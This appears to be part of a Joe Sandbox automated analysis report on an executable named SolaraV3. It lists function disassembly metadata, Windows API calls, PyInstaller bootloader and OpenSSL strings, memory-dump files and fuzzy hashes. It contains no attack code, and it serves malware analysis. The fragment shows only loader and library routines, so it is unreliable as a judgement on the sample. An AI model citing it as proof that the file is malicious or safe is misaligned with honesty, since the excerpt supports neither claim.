VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFB0BB67AA9
VirtualProtect.KERNEL32 ref: 00007FFB0BB67AC7

Strings

wB5, xrefs: 00007FFB0BB66F0B
pkey_poly1305_init, xrefs: 00007FFB0BB66EFC

Memory Dump Source

Source File: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: pkey_poly1305_init$wB5
API String ID: 3300690313-1105255960
Opcode ID: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
Instruction ID: a7c6578fcf0f44d8be7975705469039e8972fed6c7b0d48d342d8cfe319a5427
Opcode Fuzzy Hash: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
Instruction Fuzzy Hash: 586226A66281928BE7198E39D40067977D0F748789F14953AEE9FC37D4EA3CEE45CB00

Function 00007FF6DC709280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6DC7092B3
FindClose.KERNEL32 ref: 00007FF6DC7092C2

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 82ed977e490c0724387f4112aa077d80b004f8bc2e4f685765b5bb3ec7dbbf20
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: B6F06822A1C74686F7708B64F49976E7360AB84778F444336DA6E426D4DF3CD06ADB04

Function 00007FF6DC701950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC707F90: _fread_nolock.LIBCMT ref: 00007FF6DC70803A

_fread_nolock.LIBCMT ref: 00007FF6DC701A1B

Part of subcall function 00007FF6DC702910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E

Strings

Could not allocate memory for archive structure!, xrefs: 00007FF6DC701A61
MEI, xrefs: 00007FF6DC701991
fseek, xrefs: 00007FF6DC7019F5
calloc, xrefs: 00007FF6DC701A68
Could not read full TOC!, xrefs: 00007FF6DC701B55
fread, xrefs: 00007FF6DC701A32, 00007FF6DC701B5C
Failed to seek to cookie position!, xrefs: 00007FF6DC7019EE
Failed to read cookie!, xrefs: 00007FF6DC701A2B
Error on file., xrefs: 00007FF6DC701B8D
malloc, xrefs: 00007FF6DC701B22
Could not allocate buffer for TOC!, xrefs: 00007FF6DC701B1B

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 7ff6665c9b0233f84a18604e2f93f6aad3fd35cfb1582bdde42a7b36d7225fce
Instruction ID: 48af358b863a094ba1041e37a2b0a7fbe8ac0a8961aae4652bcf3dc32a0cab23
Opcode Fuzzy Hash: 7ff6665c9b0233f84a18604e2f93f6aad3fd35cfb1582bdde42a7b36d7225fce
Instruction Fuzzy Hash: 4D81C171A0868A8AEB20DB25D0502BE73B0FF48784F444437E98EC7799DE3DE5A79740

Function 00007FF6DC701470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC70149F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7015DF
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6DC701518
fseek, xrefs: 00007FF6DC7014E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7014DE
fread, xrefs: 00007FF6DC7015E6
malloc, xrefs: 00007FF6DC70151F

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 2722edef0781604a165103895e19a331bfd717a97205d6b635aa91ec701c358f
Instruction ID: b9ba899871d3670b54bf3b53ad20f490e73dd59220c7877a26ded39d0d834774
Opcode Fuzzy Hash: 2722edef0781604a165103895e19a331bfd717a97205d6b635aa91ec701c358f
Instruction Fuzzy Hash: DA41A132B0864A8AEB11DB22D4505BDA3A0FF44794F445533ED4E8BB99DE3DE563D700

Function 00007FF6DC701210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6DC7012EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6DC701276
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6DC7012BA
1.3.1, xrefs: 00007FF6DC701249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6DC70141E
malloc, xrefs: 00007FF6DC7012C1, 00007FF6DC7012F6

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: cbab2ef2869479c63bdcf1634fcbff65c3765535ea95b620844ade9d20866f24
Instruction ID: 86cdcb7e46f9813f34b6f86ac8c5fc4ab10b663316dd619ccc43144b47be829d
Opcode Fuzzy Hash: cbab2ef2869479c63bdcf1634fcbff65c3765535ea95b620844ade9d20866f24
Instruction Fuzzy Hash: 05510822B0864A86E6219B16E4503BEA2A1FF84794F484137ED4EC77D9EF3DE563D700

Function 00007FF6DC7036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036E1
GetLastError.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036EB

Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99

Strings

GetModuleFileNameW, xrefs: 00007FF6DC7036FA
Failed to obtain executable path., xrefs: 00007FF6DC7036F3
\\?\, xrefs: 00007FF6DC70375A
Failed to resolve full path to executable %ls., xrefs: 00007FF6DC703739
Failed to convert executable path to UTF-8., xrefs: 00007FF6DC703790

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 8e8d371c739a9d7afba1c888563e93fcc3cfd58bc6cd68cabf098d7fbe29a052
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: DA21C461F1C64A41FE319726E8603BE6260BF98355F804133E66DC26D5EE2DE127D740

Function 00007FF6DC71BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71BE89

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction ID: 99c03d8e260e3d2b49d0a7d6baf5f44e17883e53a85fc31120d4f2919f769fe9
Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction Fuzzy Hash: 3DC138A2A1C78F81E7618B1D90612BD3B54FB81B90F556133EA4E83795CF7CE46B8740

Function 00007FF6DC706360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LoadLibrary, xrefs: 00007FF6DC7064AE
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6DC7063C7
ucrtbase.dll, xrefs: 00007FF6DC7063DD
Failed to load Python DLL '%ls'., xrefs: 00007FF6DC7064A7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6DC706407
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6DC706456

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: 3059dc2f01a71683287ed9c1200bdf705e85bf689016b3d0645b35dcdfb4a902
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: 4D418121B18A8F91EA21DB26E4252ED6325FF54340F800133EA5D876D5EF3DE62BD740

Function 00007FF6DC715628 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715655
CreateFileW.KERNEL32 ref: 00007FF6DC715694
CloseHandle.KERNEL32 ref: 00007FF6DC7156C9

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: f2fcf0d37a12b62c590ca901a2d41bc21c043bd6961b1e52981bf9003430a903
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: C341A422E1878683E7548B24D56437D7360FB947A4F10A336E69C43AD5DF7CA5F28740

Function 00007FF6DC70CC3C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC70CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6DC70CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6DC70CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6DC70CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6DC70CD21

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 99d89fcde20f4cca788a140a4b8d814005db7b87fff77668cbe51f2059ecb85b
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 15313C21E0C24F45FE24AB66D4623BD56A1AF51384F445037E90EC72D7DE2EB927E342

Function 00007FFB0C35146A Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C396A61

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FFB0C396B57, 00007FFB0C396C29, 00007FFB0C396D5E, 00007FFB0C396DB1

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c
API String ID: 1452528299-2512360314
Opcode ID: a3e023d0b073baeba4bd492517419a31f62972f068ae63838dd34882c46fe785
Instruction ID: d0bd4473543d305c3d8def4e22e27bd34c938e38e0e3c4000a87360a4678f6bc
Opcode Fuzzy Hash: a3e023d0b073baeba4bd492517419a31f62972f068ae63838dd34882c46fe785
Instruction Fuzzy Hash: 7FB18FF2A2A24286F7A49F35C44AFBD36F0EF41B48F144435EA0946699DF3DE884CB01

Function 00007FFB0C351497 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C35D245

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFB0C35D1F1, 00007FFB0C35D2E5

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c
API String ID: 1452528299-2209325370
Opcode ID: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
Instruction ID: a1fc623796c9d5a9cb0ca6983fa0be750660ffa9f49487fccbe74a921d5eb276
Opcode Fuzzy Hash: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
Instruction Fuzzy Hash: 99816DF2A19A8681EB509F35D648FAD67A0FF44B98F184135DE4D0BB98DF38D946C340

Function 00007FF6DC71013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710277

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 8909cbd613fb996e1adbe582df758805a12db95160e7ff03f5ba0144f44b099d
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 07512921B0928986F7649A2D942467E6691BF44BF4F18A737DD7D837C9CE3CE4239600

Function 00007FFB0C351253 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFB0C35DD50

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFB0C35DE00, 00007FFB0C35DE52

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c
API String ID: 1452528299-2209325370
Opcode ID: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
Instruction ID: 3e58fb7bfc8e7603d01b464235031eb325368566e2cdf8baeae1721758137c49
Opcode Fuzzy Hash: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
Instruction Fuzzy Hash: F2416FF2A19A8182EB209F29D548EAD73A5FF44B88F544635DB4C07B94DF7DE8918700

Function 00007FF6DC71C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6DC71C2CD), ref: 00007FF6DC71C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6DC71C2CD), ref: 00007FF6DC71C18A

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

